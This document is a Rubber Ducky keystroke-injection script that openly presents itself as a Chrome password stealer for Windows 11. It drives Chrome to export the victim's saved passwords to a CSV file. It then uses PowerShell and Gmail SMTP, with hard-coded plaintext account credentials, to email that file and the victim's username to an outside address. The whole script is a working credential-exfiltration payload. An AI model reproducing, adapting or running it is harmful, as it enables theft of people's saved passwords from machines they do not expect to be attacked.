REM
REM     _____              __                            
REM    /  _  \     ____  _/  |_                          
REM   /  /_\  \   / ___\ \   __\                         
REM  /    |    \ / /_/  > |  |                           
REM  \____|__  / \___  /  |__|                           
REM          \/ /_____/                                  
REM    _________.__                 .___                 
REM   /   _____/|  |__  _____     __| _/  ____  __  _  __
REM   \_____  \ |  |  \ \__  \   / __ |  /  _ \ \ \/ \/ /
REM   /        \|   Y  \ / __ \_/ /_/ | (  <_> ) \     / 
REM  /_______  /|___|  /(____  /\____ |  \____/   \/\_/  
REM          \/      \/      \/      \/                  
REM Author: AgtShadow
REM Ducky chrome password stealer for Windows 11
REM Revision Version 1.3
REM November 15th, 2021
DELAY 1000
REM ----------- opens chrome web browser
GUI r
DELAY 500
STRING chrome
DELAY 400
ENTER
DELAY 600
REM ----------- exports passwords into csv file
STRING https://passwords.google.com/options?ep=1
ENTER
DELAY 1000
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 1500
STRING Darklotuspod98$%96$$%%Lotuspod9898
DELAY 1000
ENTER
DELAY 1000
ENTER
DELAY 1000
CONTROL W
DELAY 100
REM -------------- sends it by email using powershell
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 500
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
DELAY 100
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
DELAY 100
STRING $SMTPInfo.EnableSSL = $true
ENTER
DELAY 100
REM ---Make sure to enable less secure app access to sender's mail here: https://myaccount.google.com/lesssecureapps
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('atmosphere9999@gmail.com', 'Darklotuspod98$%96$$%%Lotuspod9898')
ENTER
DELAY 100
STRING $SMTPServer = $E = New-Object System.Net.Mail.MailMessage
ENTER
DELAY 100
STRING $E.From = 'spragginsdesigns@gmail.com'
ENTER
DELAY 100
STRING $E.To.Add('spragginsdesigns@gmail.com')
ENTER
DELAY 100
STRING $E.Subject = $env:UserName
ENTER
DELAY 100
STRING $E.Body = 'Success! The password file is attached!'
ENTER
DELAY 100
STRING $F = 'Documents/chromepasswords.csv'
ENTER
DELAY 100
STRING $E.Attachments.Add($F)
ENTER
DELAY 100
STRING $F = $SMTPInfo.Send($E)
ENTER
DELAY 100
STRING exit
ENTER